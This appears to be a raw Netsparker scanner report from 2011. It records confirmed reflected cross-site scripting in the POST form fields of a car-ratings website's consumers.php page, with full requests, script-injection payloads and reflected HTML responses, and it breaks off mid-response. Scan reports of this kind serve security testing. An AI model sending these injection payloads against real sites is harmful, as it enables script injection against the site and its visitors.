style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000A9E)</script>" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="C..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000A9F)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A9F)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:47:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000A9F)</script>" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="C..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST "><script>alert(9)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 151
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:47:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value=""><script>netsparker(9)</script>" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000AD7)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000AD7)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:48:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a 